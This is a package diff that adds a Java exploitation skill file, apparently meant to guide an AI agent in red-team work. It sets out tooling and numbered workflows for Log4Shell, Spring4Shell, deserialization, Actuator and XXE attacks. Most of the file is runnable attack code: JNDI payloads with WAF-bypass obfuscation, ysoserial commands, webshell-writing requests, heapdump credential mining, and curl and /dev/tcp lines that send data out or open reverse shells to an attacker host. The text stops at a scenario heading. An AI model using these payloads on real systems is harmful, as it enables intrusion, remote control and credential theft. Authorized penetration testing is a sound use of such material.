rtexit-method 0.1.0 → 0.1.2

package/packaged-assets/.agents/skills/rt-exploit-java/SKILL.md

@@ -0,0 +1,1009 @@
+---
+name: rt-exploit-java
+description: "Java application exploitation skill. Covers Java deserialization with ysoserial gadget chains (CommonsCollections, Spring, Hibernate), Log4Shell (CVE-2021-44228) exploitation, Spring4Shell (CVE-2022-22965), Spring Boot Actuator exposure, XXE injection in XML parsers, and JNDI injection techniques. Targets Spring Boot, Apache Struts, JBoss, WebLogic, Jenkins."
+---
+
+# rt-exploit-java
+
+## Overview
+
+Java applications represent a uniquely high-value attack surface on most enterprise engagements. Legacy frameworks (Struts, JBoss, WebLogic), modern Spring Boot deployments, and CI/CD infrastructure (Jenkins) all share a common thread: **serialized object handling, JNDI lookups, and XML parsing are endemic to the Java ecosystem and chronically misconfigured**.
+
+This skill covers:
+
+- **Java Deserialization RCE** via ysoserial gadget chains (CommonsCollections 1–7, Spring1, Hibernate1, JRMPClient, etc.)
+- **Log4Shell (CVE-2021-44228)** — JNDI injection via Log4j 2.x logging, including WAF bypass obfuscation
+- **Spring4Shell (CVE-2022-22965)** — ClassLoader manipulation via Spring MVC parameter binding
+- **Spring Boot Actuator exposure** — unauthenticated management endpoints leaking secrets, enabling code execution via `/actuator/env` + `/actuator/restart`
+- **XXE injection** — XML External Entity attacks targeting Java XML parsers (SAX, DOM, StAX)
+- **JNDI injection techniques** — beyond Log4Shell: RMI, LDAP, DNS exfiltration, bypass vectors
+
+**When to use this skill:**
+
+- Target runs Java (confirmed via `X-Powered-By`, Nmap service fingerprint, WhatWeb, favicon hash)
+- Engagement scope includes web applications on JBoss, WebLogic, GlassFish, Tomcat, Spring Boot
+- Jenkins, Nexus, or other Java-based CI/CD infrastructure is in scope
+- Deserialization endpoints are identified (Java serialization magic bytes `AC ED 00 05` in request/response)
+- Log4j version is unknown or unpatched (pre-2.17.1)
+
+**Output discipline:** All tool output MUST be saved to `_rtexit-output/exploit/java/` in structured subdirectories. Raw PoC payloads, JNDI server logs, and callback confirmations must be documented before escalating.
+
+---
+
+## Prerequisites and Setup
+
+### Required Tools
+
+```bash
+# ysoserial — Java deserialization payload generator
+# Download the all-in-one JAR
+wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar \
+  -O /opt/tools/ysoserial-all.jar
+
+# Verify Java version compatibility (ysoserial works best on Java 8/11)
+java -version
+
+# JNDI-Exploit-Kit — comprehensive JNDI injection server (replaces marshalsec)
+git clone https://github.com/pimps/JNDI-Exploit-Kit /opt/tools/JNDI-Exploit-Kit
+cd /opt/tools/JNDI-Exploit-Kit && mvn package -DskipTests -q
+
+# marshalsec — legacy JNDI server (LDAP/RMI redirect)
+git clone https://github.com/mbechler/marshalsec /opt/tools/marshalsec
+cd /opt/tools/marshalsec && mvn package -DskipTests -q
+
+# log4j-scan — automated Log4Shell scanner
+git clone https://github.com/fullhunt/log4j-scan /opt/tools/log4j-scan
+pip3 install -r /opt/tools/log4j-scan/requirements.txt
+
+# Spring4Shell-POC
+git clone https://github.com/reznok/Spring4Shell-POC /opt/tools/Spring4Shell-POC
+
+# nuclei for template-based scanning
+nuclei -update-templates
+
+# interactsh-client for OOB callback detection (by ProjectDiscovery)
+go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
+
+# httpx for quick HTTP probing
+go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
+
+# Python 3 + requests for custom HTTP exploitation
+pip3 install requests
+
+# tcpdump / Wireshark for callback verification
+which tcpdump || apt-get install -y tcpdump
+```
+
+### Environment Setup
+
+```bash
+# Set your attacker-controlled infrastructure
+export ATTACKER_IP="10.10.14.5"          # Your C2 / listener IP (must be reachable by target)
+export ATTACKER_LDAP_PORT="1389"          # JNDI LDAP server port
+export ATTACKER_RMI_PORT="1099"           # JNDI RMI server port
+export ATTACKER_HTTP_PORT="8888"          # HTTP server port (serves exploit class files)
+export CALLBACK_DOMAIN="yourburp.oastify.com"  # OOB callback domain (Burp Collaborator / interactsh)
+
+# Create output structure
+mkdir -p _rtexit-output/exploit/java/{deserialization,log4shell,spring4shell,actuator,xxe,jndi,payloads,loot}
+
+# Start interactsh listener for OOB detection
+interactsh-client -v -o _rtexit-output/exploit/java/oob-callbacks.txt &
+```
+
+### Target Fingerprinting Checklist
+
+Before exploitation, confirm Java stack:
+
+```bash
+# Nmap service/version on common Java ports
+nmap -sV -p 8080,8443,8888,4848,7001,7002,9200,9300,50000 \
+  -oA _rtexit-output/exploit/java/nmap-java-ports <TARGET>
+
+# Check HTTP headers for Java framework indicators
+curl -sk -I https://<TARGET>/ | grep -iE "x-powered-by|server|x-application"
+
+# Favicon hash check (identifies Tomcat, Jenkins, WebLogic)
+# Tomcat favicon hash: 116323821
+# Jenkins favicon hash: 831909822
+# WebLogic favicon hash: -1154529108
+curl -sk https://<TARGET>/favicon.ico | md5sum
+
+# WhatWeb aggressive scan
+whatweb http://<TARGET> -a 3 \
+  --log-json=_rtexit-output/exploit/java/whatweb.json
+
+# Check for Java serialization magic bytes in responses (AC ED 00 05 in hex)
+curl -sk http://<TARGET>/endpoint | xxd | head -5
+
+# nuclei Java-specific templates
+nuclei -u http://<TARGET> \
+  -t cves/2021/CVE-2021-44228.yaml \
+  -t cves/2022/CVE-2022-22965.yaml \
+  -t exposures/configs/spring-actuator.yaml \
+  -t technologies/java-detect.yaml \
+  -o _rtexit-output/exploit/java/nuclei-java.txt
+```
+
+---
+
+## Skill Levels
+
+### BEGINNER
+
+Suitable for: Lab environments, CTFs, learning gadget chain basics, supervised engagements.
+
+**Goal:** Understand the toolchain, generate basic payloads, confirm OOB callbacks.
+
+```bash
+# List all available ysoserial gadget chains
+java -jar /opt/tools/ysoserial-all.jar 2>&1 | head -50
+
+# Generate a basic CommonsCollections1 payload (requires Commons Collections 3.1 on target classpath)
+# Payload: execute 'id' command (for testing — replace with actual command)
+java -jar /opt/tools/ysoserial-all.jar CommonsCollections1 'id' | xxd | head -5
+
+# Test for Log4Shell with a DNS callback (no exploitation, detection only)
+# Replace with your interactsh/Burp Collaborator domain
+curl -sk "http://<TARGET>/api/login" \
+  -H 'X-Api-Version: ${jndi:dns://${CALLBACK_DOMAIN}/log4shell-test}' \
+  -d 'username=test&password=test'
+
+# Check if target has Spring Boot Actuator exposed (no auth required)
+curl -sk http://<TARGET>/actuator | python3 -m json.tool
+curl -sk http://<TARGET>/actuator/env | python3 -m json.tool
+curl -sk http://<TARGET>/actuator/health
+curl -sk http://<TARGET>/actuator/mappings
+curl -sk http://<TARGET>/actuator/beans
+```
+
+---
+
+### INTERMEDIATE
+
+Suitable for: Professional penetration tests with confirmed Java targets.
+
+**Goal:** Weaponize Log4Shell for RCE, enumerate Actuator exposure, exploit XXE.
+
+```bash
+# --- Log4Shell (CVE-2021-44228) ---
+
+# Start JNDI-Exploit-Kit LDAP server that serves a reverse shell payload
+cd /opt/tools/JNDI-Exploit-Kit
+java -jar target/JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar \
+  -L ${ATTACKER_IP}:${ATTACKER_LDAP_PORT} \
+  -P ${ATTACKER_HTTP_PORT} \
+  -C "bash -c {echo,BASE64_REVERSE_SHELL}|{base64,-d}|bash"
+# Note: generate BASE64_REVERSE_SHELL with:
+# echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' | base64 -w0
+
+# Start netcat listener before triggering payload
+nc -lvnp 4444 | tee _rtexit-output/exploit/java/log4shell/shell-session.txt
+
+# Trigger Log4Shell via common injection points
+# User-Agent header
+curl -sk "http://<TARGET>/index" \
+  -A '${jndi:ldap://${ATTACKER_IP}:${ATTACKER_LDAP_PORT}/exploit}' \
+  -o /dev/null
+
+# X-Forwarded-For header
+curl -sk "http://<TARGET>/api/v1/users" \
+  -H "X-Forwarded-For: \${jndi:ldap://${ATTACKER_IP}:${ATTACKER_LDAP_PORT}/exploit}"
+
+# POST body parameter
+curl -sk -X POST "http://<TARGET>/api/login" \
+  -H "Content-Type: application/json" \
+  -d "{\"username\":\"\${jndi:ldap://${ATTACKER_IP}:${ATTACKER_LDAP_PORT}/exploit}\",\"password\":\"test\"}"
+
+# --- Automated Log4Shell scan ---
+python3 /opt/tools/log4j-scan/log4j-scan.py \
+  -u "http://<TARGET>" \
+  --run-all-tests \
+  --custom-dns-callback-host ${CALLBACK_DOMAIN} \
+  2>&1 | tee _rtexit-output/exploit/java/log4shell/scan-results.txt
+
+# --- XXE Injection ---
+
+# Basic XXE payload to read /etc/passwd via file:// protocol
+cat > /tmp/xxe-basic.xml << 'EOF'
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+  <!ENTITY xxe SYSTEM "file:///etc/passwd">
+]>
+<root><data>&xxe;</data></root>
+EOF
+
+curl -sk -X POST "http://<TARGET>/api/upload" \
+  -H "Content-Type: application/xml" \
+  -d @/tmp/xxe-basic.xml \
+  | tee _rtexit-output/exploit/java/xxe/xxe-passwd.txt
+
+# OOB XXE (for blind injection — no response reflection)
+cat > /tmp/xxe-oob.xml << 'EOF'
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+  <!ENTITY % xxe SYSTEM "http://ATTACKER_IP:8888/evil.dtd">
+  %xxe;
+]>
+<root><data>test</data></root>
+EOF
+
+# Serve the evil.dtd (captures file contents via OOB HTTP)
+cat > /tmp/evil.dtd << 'EOF'
+<!ENTITY % file SYSTEM "file:///etc/passwd">
+<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM 'http://ATTACKER_IP:8888/?data=%file;'>">
+%wrap;
+%send;
+EOF
+python3 -m http.server 8888 --directory /tmp &
+
+# Spring Boot Actuator — env poisoning for RCE (via spring.datasource.url trick)
+# Step 1: Read current env to find writable properties
+curl -sk http://<TARGET>/actuator/env | python3 -m json.tool \
+  | tee _rtexit-output/exploit/java/actuator/env-dump.txt
+
+# Step 2: Write a malicious property (spring.cloud.bootstrap.location for RCE)
+curl -sk -X POST "http://<TARGET>/actuator/env" \
+  -H "Content-Type: application/json" \
+  -d '{"name":"spring.cloud.bootstrap.location","value":"http://'${ATTACKER_IP}':8888/malicious.yml"}'
+
+# Step 3: Restart the application to apply the poisoned config
+curl -sk -X POST "http://<TARGET>/actuator/restart"
+```
+
+---
+
+### ADVANCED
+
+Suitable for: Red Team operators on hardened targets with WAFs and patched systems.
+
+**Goal:** WAF bypass for Log4Shell, gadget chain selection for specific classpath, deserialization blind exploitation.
+
+```bash
+# --- Log4Shell WAF Bypass Obfuscation ---
+
+# Technique 1: Nested lookup obfuscation (bypasses naive string matching)
+curl -sk "http://<TARGET>/api" \
+  -H 'X-Api-Version: ${${lower:j}ndi:${lower:l}dap://'${ATTACKER_IP}':'${ATTACKER_LDAP_PORT}'/exploit}'
+
+# Technique 2: Upper/lower case mixing
+curl -sk "http://<TARGET>/api" \
+  -H 'X-Custom: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://'${ATTACKER_IP}':'${ATTACKER_LDAP_PORT}'/a}'
+
+# Technique 3: URL encoding within JNDI
+curl -sk "http://<TARGET>/api" \
+  -H 'User-Agent: ${jndi:ldap://'${ATTACKER_IP}':'${ATTACKER_LDAP_PORT}'/%2F%2Fa}'
+
+# Technique 4: Protocol substitution (DNS for detection, then RMI for exploitation)
+curl -sk "http://<TARGET>/api" \
+  -H 'X-Forwarded-For: ${jndi:rmi://'${ATTACKER_IP}':'${ATTACKER_RMI_PORT}'/exploit}'
+
+# Technique 5: Localhost bypass using 127.0.0.1 indirection (internal SSRF pivot)
+curl -sk "http://<TARGET>/api" \
+  -H 'Referer: ${jndi:ldap://127.0.0.1#'${ATTACKER_IP}':'${ATTACKER_LDAP_PORT}'/exploit}'
+
+# Technique 6: Double encoding for WAF bypass
+# ${${env:NaN:-j}ndi:${env:NaN:-l}dap://attacker}
+curl -sk "http://<TARGET>/api" \
+  -H 'X-Custom-Header: ${${env:NaN:-j}ndi:${env:NaN:-l}dap://'${ATTACKER_IP}':'${ATTACKER_LDAP_PORT}'/exploit}'
+
+# --- ysoserial Gadget Chain Selection ---
+
+# Identify target classpath libraries from error messages / known app stack
+# CommonsCollections1  -> Commons Collections 3.1, Java <8u71
+# CommonsCollections2  -> Commons Collections 4.0, Java <8u71
+# CommonsCollections3  -> Commons Collections 3.1 (alternate chain)
+# CommonsCollections4  -> Commons Collections 4.0 (alternate chain)
+# CommonsCollections5  -> Commons Collections 3.1, any JDK (uses BadAttributeValueExpException)
+# CommonsCollections6  -> Commons Collections 3.1/4.0, any JDK (no Sun classes needed)
+# CommonsCollections7  -> Commons Collections 3.1, any JDK (HashTable-based)
+# Spring1              -> Spring Core 4.1.4-5.3.x
+# Hibernate1           -> Hibernate 3/4/5 + DOM4J
+# JRMPClient           -> Java RMI — triggers JRMP connection (for gadget chaining)
+# Jdk7u21              -> Any JDK < 7u21 (no 3rd party deps needed)
+# URLDNS               -> Any JDK, DNS only (for detection, no RCE)
+
+# Gadget chain detection via URLDNS (safe — DNS callback only, no command execution)
+java -jar /opt/tools/ysoserial-all.jar URLDNS "http://${CALLBACK_DOMAIN}/ysoserial-detect" \
+  | base64 -w0 > _rtexit-output/exploit/java/deserialization/urldns-payload.b64
+
+# CommonsCollections6 — most universally compatible (no JDK version restriction)
+java -jar /opt/tools/ysoserial-all.jar CommonsCollections6 \
+  'curl http://'${ATTACKER_IP}':8888/cc6-callback -d "$(id)"' \
+  > _rtexit-output/exploit/java/deserialization/cc6-payload.bin
+
+# CommonsCollections5 — reliable for JBoss/Tomcat with CC 3.1
+java -jar /opt/tools/ysoserial-all.jar CommonsCollections5 \
+  'bash -c {echo,'$(echo -n "bash -i >& /dev/tcp/${ATTACKER_IP}/4444 0>&1" | base64 -w0)'}|{base64,-d}|bash' \
+  > _rtexit-output/exploit/java/deserialization/cc5-revshell.bin
+
+# Spring1 — for Spring Framework targets
+java -jar /opt/tools/ysoserial-all.jar Spring1 \
+  'curl http://'${ATTACKER_IP}':8888/spring-callback -d "$(whoami)"' \
+  > _rtexit-output/exploit/java/deserialization/spring1-payload.bin
+
+# WebLogic-specific payload delivery (T3 protocol on port 7001)
+java -jar /opt/tools/ysoserial-all.jar JRMPClient ${ATTACKER_IP}:${ATTACKER_RMI_PORT} \
+  > _rtexit-output/exploit/java/deserialization/jrmpclient-payload.bin
+
+# Send binary payload to a Java deserialization endpoint via curl
+curl -sk -X POST "http://<TARGET>/deserialize" \
+  -H "Content-Type: application/x-java-serialized-object" \
+  --data-binary @_rtexit-output/exploit/java/deserialization/cc6-payload.bin \
+  -o _rtexit-output/exploit/java/deserialization/response.txt
+
+# For endpoints using base64-encoded serialized objects (common in cookies/JWT)
+PAYLOAD_B64=$(java -jar /opt/tools/ysoserial-all.jar CommonsCollections6 \
+  'curl http://'${ATTACKER_IP}':8888/callback -d @/etc/passwd' | base64 -w0)
+curl -sk "http://<TARGET>/dashboard" \
+  -H "Cookie: session=${PAYLOAD_B64}"
+```
+
+---
+
+### EXPERT
+
+Suitable for: Mature Red Team operations, adversary simulation, evasion-heavy engagements.
+
+**Goal:** Full Java exploitation chain from reconnaissance to persistence — chained vulnerabilities, OPSEC-aware delivery, post-exploitation via Java agent injection.
+
+```bash
+# --- Spring4Shell (CVE-2022-22965) Full Exploitation ---
+# Targets Spring MVC 5.3.0-5.3.17, 5.2.0-5.2.19 on Tomcat + JDK 9+
+# NOT applicable to Spring Boot embedded Tomcat (WAR deployment required)
+
+# Step 1: Confirm vulnerability conditions
+# - JDK 9 or later
+# - Spring MVC 5.3.0-5.3.17 or 5.2.0-5.2.19
+# - Deployed as WAR on Tomcat (not embedded)
+# - Has a parameter-binding endpoint (Controller with @RequestMapping)
+
+# Step 2: Use automated PoC
+cd /opt/tools/Spring4Shell-POC
+python3 spring4shell.py \
+  --url "http://<TARGET>/endpoint" \
+  --file-name webshell.jsp \
+  --file-path /tmp/webshell.jsp \
+  2>&1 | tee _rtexit-output/exploit/java/spring4shell/exploit-log.txt
+
+# Step 3: If PoC succeeds, verify webshell upload
+curl -sk "http://<TARGET>/webshell.jsp?cmd=id"
+
+# Manual Spring4Shell payload (ClassLoader manipulation via data binding)
+# Sets log pattern to write JSP webshell to Tomcat's webroot
+curl -sk -X POST "http://<TARGET>/register" \
+  --data 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat='
+
+# Trigger webshell after Tomcat log rotation writes the file
+curl -sk "http://<TARGET>/shell.jsp?pwd=j&cmd=id" \
+  | tee _rtexit-output/exploit/java/spring4shell/rce-output.txt
+
+# --- Advanced Actuator Exploitation ---
+
+# Full Actuator endpoint enumeration with auth bypass attempts
+for endpoint in env beans mappings configprops httptrace auditlog loggers heapdump threaddump jolokia info refresh; do
+  echo "=== /actuator/${endpoint} ==="
+  curl -sk "http://<TARGET>/actuator/${endpoint}" \
+    -H "Authorization: Basic $(echo -n 'admin:admin' | base64)" \
+    | python3 -m json.tool 2>/dev/null || echo "[raw response]"
+done | tee _rtexit-output/exploit/java/actuator/full-enum.txt
+
+# Jolokia MBean exploitation (if /actuator/jolokia is exposed)
+# Read system property via MBean
+curl -sk "http://<TARGET>/actuator/jolokia/read/java.lang:type=Runtime/SystemProperties" \
+  | python3 -m json.tool | tee _rtexit-output/exploit/java/actuator/jolokia-sysinfo.txt
+
+# Jolokia JNDI via MBeanServer.createMBean (triggers JNDI lookup on older versions)
+curl -sk -X POST "http://<TARGET>/actuator/jolokia" \
+  -H "Content-Type: application/json" \
+  -d '{"type":"EXEC","mbean":"com.sun.management:type=DiagnosticCommand","operation":"vmLog","arguments":["output=file:/tmp/pwned"]}' \
+  | python3 -m json.tool
+
+# Heapdump extraction and credential mining
+curl -sk "http://<TARGET>/actuator/heapdump" \
+  -o _rtexit-output/exploit/java/actuator/heapdump.hprof
+# Analyze with Eclipse Memory Analyzer (MAT) or jhat
+# Quick string grep for credentials/tokens
+strings _rtexit-output/exploit/java/actuator/heapdump.hprof | \
+  grep -iE "password|secret|token|api.?key|jdbc|datasource" | sort -u \
+  | tee _rtexit-output/exploit/java/actuator/heapdump-creds.txt
+
+# Spring Boot loggers endpoint — enable DEBUG logging for credential exposure
+curl -sk -X POST "http://<TARGET>/actuator/loggers/org.springframework.security" \
+  -H "Content-Type: application/json" \
+  -d '{"configuredLevel":"TRACE"}'
+
+# --- Advanced JNDI-Inject-Kit Setup ---
+# JNDI-Exploit-Kit supports: LDAP, RMI, DNS, HTTP — all from one server
+cd /opt/tools/JNDI-Exploit-Kit
+
+# Start with reverse shell payload (Base64-encoded bash one-liner)
+REVSHELL=$(echo -n "bash -i >& /dev/tcp/${ATTACKER_IP}/4444 0>&1" | base64 -w0)
+java -jar target/JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar \
+  -L ${ATTACKER_IP}:${ATTACKER_LDAP_PORT} \
+  -R ${ATTACKER_IP}:${ATTACKER_RMI_PORT} \
+  -P ${ATTACKER_HTTP_PORT} \
+  -C "bash -c {echo,${REVSHELL}}|{base64,-d}|bash" \
+  2>&1 | tee _rtexit-output/exploit/java/jndi/jndi-server.log &
+
+# Available JNDI paths served (JNDI-Exploit-Kit):
+#  ldap://ATTACKER:1389/Basic/Command/Base64/<base64-cmd>
+#  ldap://ATTACKER:1389/Basic/ReverseShell/ATTACKER/PORT
+#  ldap://ATTACKER:1389/Basic/WebShell/ATTACKER/PORT
+#  ldap://ATTACKER:1389/Deserialization/CommonsCollections6/Command/Base64/<base64-cmd>
+#  rmi://ATTACKER:1099/Basic/Command/Base64/<base64-cmd>
+
+# Using deserialization chain via LDAP (bypasses Java 8u191+ trustURLCodebase restriction)
+java -jar target/JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar \
+  -L ${ATTACKER_IP}:${ATTACKER_LDAP_PORT} \
+  -C "curl http://${ATTACKER_IP}:8888/callback -d \$(id)" \
+  -Deserialization CommonsCollections6
+
+# Trigger with Log4Shell payload pointing to deserialization chain
+curl -sk "http://<TARGET>/api" \
+  -H "X-Api-Version: \${jndi:ldap://${ATTACKER_IP}:${ATTACKER_LDAP_PORT}/Deserialization/CommonsCollections6/Command/Base64/$(echo -n 'curl http://'${ATTACKER_IP}':8888/pwned -d $(id)' | base64 -w0)}"
+```
+
+---
+
+## Step-by-Step Numbered Workflow
+
+### Phase 1: Java Stack Identification
+
+1. Run Nmap on common Java application ports (8080, 8443, 8888, 4848, 7001, 7002, 9200, 50000)
+2. Check HTTP response headers for `X-Powered-By`, `Server`, `X-Application-Context`
+3. Run WhatWeb with aggression level 3 and save JSON output
+4. Check for Spring Boot Actuator at `/actuator`, `/actuator/health`, `/actuator/env`
+5. Check for Java serialization endpoints — look for `AC ED 00 05` magic bytes in response bodies
+6. Run nuclei with Java/CVE templates
+7. Check favicon hash against known Java framework hashes
+8. Note the exact version of frameworks where possible (error messages, `/actuator/info`, Nmap banner)
+
+### Phase 2: Log4Shell Assessment
+
+9. Confirm Log4j is in use (check dependency files if source is available, or infer from stack traces)
+10. Set up interactsh or Burp Collaborator for OOB callback detection
+11. Run log4j-scan against the target with all test modes enabled
+12. Manually test high-value injection points: `User-Agent`, `X-Forwarded-For`, `X-Api-Version`, `Referer`, POST body fields, JSON values, XML elements, HTTP headers named after parameters
+13. If DNS callback received: confirm JNDI lookup is working, escalate to LDAP payload
+14. Stand up JNDI-Exploit-Kit with appropriate payload
+15. Trigger exploitation payload and catch reverse shell
+16. If WAF is blocking: apply obfuscation techniques (nested lookups, upper/lower, URL encoding)
+
+### Phase 3: Spring4Shell Assessment
+
+17. Confirm Spring MVC version and deployment type (WAR on Tomcat vs embedded Tomcat)
+18. Confirm JDK version >= 9
+19. Identify parameter-binding controllers via `/actuator/mappings` or source review
+20. Run Spring4Shell-POC against candidate endpoints
+21. If webshell is written: verify via HTTP request to written JSP
+22. Upgrade from webshell to reverse shell using in-shell command
+
+### Phase 4: Deserialization Assessment
+
+23. Identify serialized object endpoints — check for magic bytes, `viewstate` parameters, RMI ports, JMX ports
+24. Use URLDNS gadget chain for safe callback-based detection
+25. Enumerate target classpath (error messages, Maven POM exposure via Actuator, known app stack)
+26. Select appropriate gadget chain based on confirmed libraries
+27. Generate binary payload with ysoserial
+28. Deliver payload to endpoint, monitor HTTP server for callback
+29. Escalate to reverse shell payload once callback confirmed
+
+### Phase 5: Actuator Post-Exploitation
+
+30. Extract full environment dump from `/actuator/env` — parse for credentials, API keys, DB URLs
+31. Download heapdump from `/actuator/heapdump` and mine strings for sensitive data
+32. Check `/actuator/httptrace` for recent requests including Authorization headers
+33. Attempt Jolokia MBean enumeration for JVM introspection
+34. Attempt environment variable poisoning via POST to `/actuator/env` + `/actuator/restart`
+35. Document all extracted data in `_rtexit-output/exploit/java/actuator/`
+
+### Phase 6: Documentation
+
+36. Save all payloads, server logs, and shell session transcripts
+37. Screenshot all successful RCE proof points (hostname, IP, `id`, `whoami`, `date`)
+38. Document gadget chain used, Java version, library versions confirmed
+39. Hand off to scribe agent for formal reporting
+
+---
+
+## Payload Examples with Explanations
+
+### Log4Shell JNDI Payload Anatomy
+
+```
+${jndi:ldap://attacker.com:1389/exploit}
+```
+
+- `${...}` — Log4j lookup expression (evaluated during log message processing)
+- `jndi:` — triggers Java Naming and Directory Interface resolution
+- `ldap://` — LDAP protocol (port 1389 typical for attacker server)
+- `attacker.com:1389` — attacker-controlled JNDI server
+- `/exploit` — path on JNDI server that returns a malicious `Reference` object pointing to attacker's HTTP-hosted Java class
+
+**How it works:**
+1. Application logs a string containing the payload (login failure message, User-Agent in access log, etc.)
+2. Log4j processes the string and evaluates `${jndi:...}` lookup
+3. Java makes an LDAP request to attacker's server
+4. LDAP server returns a `Reference` containing `codebase` URL pointing to attacker's HTTP server
+5. JVM fetches and instantiates the malicious class from attacker's HTTP server
+6. Malicious class constructor executes arbitrary OS command
+
+**Java 8u191+ Restriction Bypass:**
+After Java 8u191, `com.sun.jndi.ldap.object.trustURLCodebase=false` by default, blocking remote class loading via LDAP codebase. Bypass via:
+- Deserialization gadget chains served via LDAP `javaSerializedData` attribute (no trustURLCodebase needed)
+- Local gadget chains using `javax.naming.Reference` with locally-available factories
+
+### ysoserial CommonsCollections6 Payload
+
+```bash
+java -jar ysoserial-all.jar CommonsCollections6 'curl http://attacker/cb -d $(id)'
+```
+
+**Chain:** `HashSet` → `HashMap` → `TiedMapEntry` → `LazyMap` → `ChainedTransformer` → `InvokerTransformer` → `Runtime.exec()`
+
+- CC6 uses `HashSet`/`HashMap` which are standard Java — no JDK version restriction
+- Suitable for any Java version from 6 onwards
+- Does not require Sun-specific classes (unlike CC1 which needs `AnnotationInvocationHandler`)
+- Triggers during `readObject()` of the outer `HashSet`
+
+### Spring4Shell Payload Explanation
+
+```
+class.module.classLoader.resources.context.parent.pipeline.first.pattern=<JSP_WEBSHELL>
+class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
+class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
+class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell
+class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_
+```
+
+**How it works:**
+1. Spring MVC's data binding maps HTTP parameters to Java object properties via `PropertyEditor`
+2. `class` maps to `Object.getClass()` — available on any bound Java object
+3. `class.module.classLoader` navigates to Tomcat's `ParallelWebappClassLoader`
+4. `.resources.context.parent.pipeline.first` reaches Tomcat's `AccessLogValve`
+5. Setting `pattern`, `suffix`, `directory`, `prefix` makes Tomcat write a log file — with attacker-controlled content — as a `.jsp` file in the webroot
+6. Visiting the written JSP executes the embedded code
+
+### XXE Payload Variants
+
+```xml
+<!-- Basic file read -->
+<?xml version="1.0"?>
+<!DOCTYPE data [<!ENTITY file SYSTEM "file:///etc/passwd">]>
+<data>&file;</data>
+
+<!-- SSRF via XXE (internal network scanning) -->
+<?xml version="1.0"?>
+<!DOCTYPE data [<!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/">]>
+<data>&ssrf;</data>
+
+<!-- Java-specific: read classpath resource -->
+<?xml version="1.0"?>
+<!DOCTYPE data [<!ENTITY cp SYSTEM "classpath:application.properties">]>
+<data>&cp;</data>
+
+<!-- OOB XXE via parameter entity (blind) -->
+<?xml version="1.0"?>
+<!DOCTYPE data [
+  <!ENTITY % dtd SYSTEM "http://ATTACKER_IP:8888/evil.dtd">
+  %dtd;
+]>
+<data>test</data>
+```
+
+---
+
+## Tool Commands with Flags Explained
+
+### ysoserial
+
+```bash
+java -jar ysoserial-all.jar \
+  CommonsCollections6 \         # Gadget chain name
+  'id'                          # Command to execute (use bash/curl for callbacks)
+  > payload.bin                 # Output binary payload (raw Java serialized object)
+
+# Flags: None — positional args only: <gadget_chain> <command>
+# Output: Binary Java serialized object, pipe to file or base64
+# Java 8 required for most chains (use: java8 -jar ysoserial-all.jar ...)
+```
+
+### JNDI-Exploit-Kit
+
+```bash
+java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar \
+  -L ${ATTACKER_IP}:1389 \     # Listen address for LDAP server
+  -R ${ATTACKER_IP}:1099 \     # Listen address for RMI server  
+  -P 8888 \                    # HTTP server port (serves compiled exploit classes)
+  -C "id" \                    # Command to embed in exploit class (default payload)
+  -Deserialization CommonsCollections6  # Use deserialization gadget (bypasses trustURLCodebase)
+```
+
+### log4j-scan
+
+```bash
+python3 log4j-scan.py \
+  -u "http://target.com" \     # Target URL
+  --run-all-tests \            # Test all HTTP headers and parameters
+  --waf-bypass \               # Enable WAF bypass obfuscation variants
+  --dns-callback-provider custom \
+  --custom-dns-callback-host "yourdomain.oastify.com" \  # OOB callback domain
+  -l /path/to/urls.txt \       # Batch mode: list of URLs to test
+  --request-type post \        # Also POST body injection
+  -t 5                         # Timeout per request in seconds
+```
+
+### marshalsec (legacy JNDI redirect)
+
+```bash
+# LDAP server that redirects to HTTP-hosted class
+java -cp marshalsec-0.0.3-SNAPSHOT-all.jar \
+  marshalsec.jndi.LDAPRefServer \
+  "http://${ATTACKER_IP}:8888/#Exploit"   # URL of compiled exploit class
+
+# RMI server
+java -cp marshalsec-0.0.3-SNAPSHOT-all.jar \
+  marshalsec.jndi.RMIRefServer \
+  "http://${ATTACKER_IP}:8888/#Exploit"
+```
+
+### interactsh-client
+
+```bash
+interactsh-client \
+  -v \                         # Verbose — show all interactions in real time
+  -o callbacks.txt \           # Save interactions to file
+  -server oast.pro             # Use public interactsh server (or self-hosted)
+```
+
+### nuclei (Java-specific templates)
+
+```bash
+nuclei \
+  -u "http://target.com" \
+  -t cves/2021/CVE-2021-44228.yaml \    # Log4Shell detection
+  -t cves/2022/CVE-2022-22965.yaml \   # Spring4Shell detection
+  -t exposures/configs/spring-actuator.yaml \  # Actuator exposure
+  -t vulnerabilities/java/ \            # All Java vulnerability templates
+  -severity critical,high \             # Filter by severity
+  -o nuclei-java.txt \
+  -stats \                              # Show progress stats
+  -timeout 10                           # Per-request timeout
+```
+
+---
+
+## Real-World Attack Scenarios
+
+### Scenario 1: Jenkins CI/CD RCE via Log4Shell
+
